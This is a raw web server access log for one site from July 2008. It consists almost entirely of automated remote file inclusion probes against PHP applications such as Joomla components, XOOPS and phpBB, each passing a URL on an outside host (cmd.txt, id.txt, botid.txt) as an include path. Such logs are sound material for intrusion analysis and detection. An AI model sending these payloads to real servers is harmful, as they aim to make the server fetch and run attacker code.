66.240.182.203 - - [14/Jul/2008:12:36:35 -0700] "GET /!scanhttp://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:12:36:51 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../osyid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:12:36:51 -0700] "GET /logs/access_080212.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../osyid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:12:36:51 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../osyid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.241 - - [14/Jul/2008:12:36:58 -0700] "GET //help.php?css_path=http://maringgai.t35.com/load.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
77.79.246.241 - - [14/Jul/2008:12:36:58 -0700] "GET /logs//help.php?css_path=http://maringgai.t35.com/load.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:37:03 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:12:37:08 -0700] "GET /logs/access_080218.log//codebb/lang_select?phpbb_root_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:37:10 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:37:10 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:12:37:12 -0700] "GET /logs/access_080327.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:12:37:12 -0700] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:12:37:12 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:12:37:14 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:12:37:15 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:37:18 -0700] "GET /logs/access_080329.log/!scanhttp://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:12:37:40 -0700] "GET /logs/access_080228.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:37:52 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:37:52 -0700] "GET /errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:37:53 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.182.191.60 - - [14/Jul/2008:12:37:54 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.60 - - [14/Jul/2008:12:37:54 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:38:04 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:38:04 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:12:38:08 -0700] "GET /logs/access_080303.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../osyid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:38:09 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:38:10 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.246 - - [14/Jul/2008:12:38:28 -0700] "GET /logs/access_080205.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:38:44 -0700] "GET //guestbook/admin.php?include_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.18.142.194 - - [14/Jul/2008:12:39:05 -0700] "GET /port.php?content=http://www.fx-arts.de//contenido/cronjobs/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
64.18.142.194 - - [14/Jul/2008:12:39:08 -0700] "GET /logs/port.php?content=http://www.fx-arts.de//contenido/cronjobs/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:12:39:20 -0700] "GET //guestbook/admin.php?include_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.22.250 - - [14/Jul/2008:12:39:55 -0700] "GET //modules/Forums/admin/errors.php?error=http://co.nnect.net/cache/all.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
189.77.91.153 - - [14/Jul/2008:12:40:19 -0700] "GET /logs/access_080117.log/[Scripthttp://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.77.91.153 - - [14/Jul/2008:12:40:23 -0700] "GET /[Scripthttp://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.77.91.153 - - [14/Jul/2008:12:40:27 -0700] "GET /logs/[Scripthttp://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:12:40:31 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:12:40:32 -0700] "GET //common/db.php?commonpath=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:12:40:32 -0700] "GET /logs//common/db.php?commonpath=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.55.211.24 - - [14/Jul/2008:12:40:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.24 - - [14/Jul/2008:12:40:41 -0700] "GET /bikes/dteel/2008-05-30/?M=D HTTP/1.1" 200 6027 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:41:37 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:41:37 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:41:38 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:42:01 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:42:02 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:42:08 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:42:09 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:42:09 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:42:26 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:12:43:24 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.116 - - [14/Jul/2008:12:43:35 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.116 - - [14/Jul/2008:12:43:35 -0700] "GET //common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.116 - - [14/Jul/2008:12:43:36 -0700] "GET /logs//common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:12:43:51 -0700] "GET /logs/access_080229.log//guestbook/admin.php?include_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:12:43:51 -0700] "GET //guestbook/admin.php?include_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:12:43:51 -0700] "GET /logs//guestbook/admin.php?include_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:12:44:04 -0700] "GET /logs/access_080229.log//guestbook/admin.php?include_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:12:44:04 -0700] "GET //guestbook/admin.php?include_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:12:44:04 -0700] "GET /logs//guestbook/admin.php?include_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:12:44:13 -0700] "GET /logs/access_080315.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.154.27 - - [14/Jul/2008:12:44:17 -0700] "GET /logs/access.log/errors.php?error=http://queb3.info/cruise/t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:44:22 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:44:40 -0700] "GET /logs/access_080229.log//guestbook/admin.php?include_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:44:41 -0700] "GET //guestbook/admin.php?include_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:44:41 -0700] "GET /logs//guestbook/admin.php?include_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [14/Jul/2008:12:44:42 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://co.nnect.net/cache/all.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:45:02 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.22.250 - - [14/Jul/2008:12:45:07 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://co.nnect.net/cache/all.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:45:45 -0700] "GET /logs/access.log/players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:12:46:41 -0700] "GET /logs/access_080322.log//login.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:46:47 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.141.234.2 - - [14/Jul/2008:12:47:29 -0700] "GET /logs/access_080117.log/index2.php?x=http://users5.TitanicHost.com/onix2131/cmda.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.141.234.2 - - [14/Jul/2008:12:47:30 -0700] "GET /logs/index2.php?x=http://users5.TitanicHost.com/onix2131/cmda.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.22.250 - - [14/Jul/2008:12:47:55 -0700] "GET /logs/access_080118.log//modules/Forums/admin/errors.php?error=http://co.nnect.net/cache/all.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [14/Jul/2008:12:47:55 -0700] "GET /logs//modules/Forums/admin/errors.php?error=http://co.nnect.net/cache/all.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:12:48:03 -0700] "GET /?mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 200 18425 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:48:22 -0700] "GET /logs/access.log/page.php?s=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:48:22 -0700] "GET /logs/access.log/page.php?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.141.56.116 - - [14/Jul/2008:12:49:10 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.116 - - [14/Jul/2008:12:49:10 -0700] "GET //common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.116 - - [14/Jul/2008:12:49:10 -0700] "GET /logs//common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.22.250 - - [14/Jul/2008:12:49:29 -0700] "GET /logs/access_080128.log//modules/Forums/admin/errors.php?error=http://co.nnect.net/cache/all.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
189.77.91.153 - - [14/Jul/2008:12:50:10 -0700] "GET /logs/access_080117.log//admin/index.php?o=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.77.91.153 - - [14/Jul/2008:12:50:12 -0700] "GET //admin/index.php?o=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.77.91.153 - - [14/Jul/2008:12:50:15 -0700] "GET /logs//admin/index.php?o=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:12:50:54 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:51:21 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:51:22 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:12:51:24 -0700] "GET /logs//?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 56141 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:12:51:26 -0700] "GET //?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18387 "-" "libwww-perl/5.811" "www.dmulk.com"
87.19.67.108 - - [14/Jul/2008:12:51:48 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.19.67.108 - - [14/Jul/2008:12:51:49 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.19.67.108 - - [14/Jul/2008:12:52:00 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:12:52:19 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:52:40 -0700] "GET /logs/access_080322.log//login.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:53:04 -0700] "GET //help.php?css_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:12:53:21 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.19.67.108 - - [14/Jul/2008:12:53:31 -0700] "GET /logs/access_080218.log//modules/xfsection/modify.php?dir_module=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.183 - - [14/Jul/2008:12:53:46 -0700] "GET ///update/update6.php?lang=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
205.234.252.183 - - [14/Jul/2008:12:53:46 -0700] "GET /logs///update/update6.php?lang=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
219.141.234.2 - - [14/Jul/2008:12:54:19 -0700] "GET /index2.php?x=http://users5.TitanicHost.com/onix2131/cmda.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:54:30 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:54:30 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:54:30 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:54:33 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:54:38 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:54:40 -0700] "GET /errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:54:41 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.101.157.249 - - [14/Jul/2008:12:55:23 -0700] "GET /multithumb.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
75.101.157.249 - - [14/Jul/2008:12:55:23 -0700] "GET /logs/multithumb.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:55:36 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:55:45 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:12:55:59 -0700] "GET /logs/access_080207.log//zero_vote/ask_password.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:12:56:00 -0700] "GET //zero_vote/ask_password.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:12:56:27 -0700] "GET /logs/access_071224.log//zero_vote/ask_password.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:56:27 -0700] "GET /logs/access_080315.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:56:35 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:56:35 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:56:35 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
